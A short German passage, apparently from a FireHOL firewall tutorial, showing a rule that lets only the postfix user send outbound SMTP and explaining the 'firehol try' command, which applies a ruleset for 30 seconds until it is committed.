  # Nur "postfix" darf SMTP ausgehend verwenden
  client smtp             accept          user "postfix"

FireHOL liefert eine Funktion mit die es ermöglicht Filtersets zu testen ohne das Risiko sich auszusperren. Das Filterset wird für 30 Sekunden aktiviert. In dieser Zeit hat man die Möglichkeit die Filter zu testen. Falls das Filterset funktioniert kann man mit der Eingabe von “commit” nach den 30 Sekunden das Filterset dauerhaft aktivieren, wenn nicht einfach Return drücken.

  /sbin/firehol try
  Keep the firewall? (type 'commit' to accept - 30 seconds timeout) :